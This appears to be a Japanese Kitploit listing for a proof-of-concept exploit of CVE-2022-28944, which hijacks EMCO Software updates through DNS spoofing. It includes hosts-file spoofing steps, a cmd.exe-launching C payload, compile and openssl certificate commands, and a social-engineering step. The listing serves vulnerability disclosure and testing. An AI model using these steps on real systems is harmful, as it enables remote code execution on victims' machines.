Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-28944 — EMCO Software製品における、DNSスプーフィングと悪意のあるアップデート注入を介した未認証のリモートコード実行の概念実証エクスプロイト。 | Kitploit
ツール/GitHubGitHub/gar-re/cve-2022-28944
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツールペイロード開発
GitHubgar-re/cve-2022-28944

cve-2022-28944

EMCO Software製品における、DNSスプーフィングと悪意のあるアップデート注入を介した未認証のリモートコード実行の概念実証エクスプロイト。

リポジトリを見る
4133年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-28944

EMCO Software の複数製品における、認証されていない更新によるリモートコード実行の脆弱性。

使用方法: python3 cve-2022-28944_poc.py

詳細はレポート gerr.re を参照してください。

再現手順

  1. EMCO Software の影響を受ける製品をインストールします。
  2. storage.emcosoftware.com のスプーフィングを攻撃者側の IP に設定します。
    • 概念実証のためには、ターゲット上の c:\windows\system32\drivers\etc\hosts を編集します。
      • 注: 攻撃者は例えば以下を使用する可能性があります:
        • 設定が不適切なルーター/スイッチ/DNS、
        • DNSスプーフィング / キャッシュポイズニング、
        • ARPスプーフィング / キャッシュポイズニング。
  3. 攻撃者側で proof.c をコンパイルします。例: i686-w64-mingw32-gcc proof.c -o proof.exe を使用します。
root@kitploit:~
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
  1. 自己署名証明書を生成します。
    • 例: openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com" を使用します。
  2. 概念実証スクリプトを実行します。
  3. EMCO Software の影響を受ける製品を起動し、次のいずれかを実行します。
    • 自動更新をトリガーするために1日待つか、
    • アプリケーションメニューから手動で更新をトリガーします。
  4. 更新ウィザードで更新を承認します。
    • 攻撃者は、説得力のある更新説明を使用して、ターゲットに更新の承認を促します。
ツールをダウンロード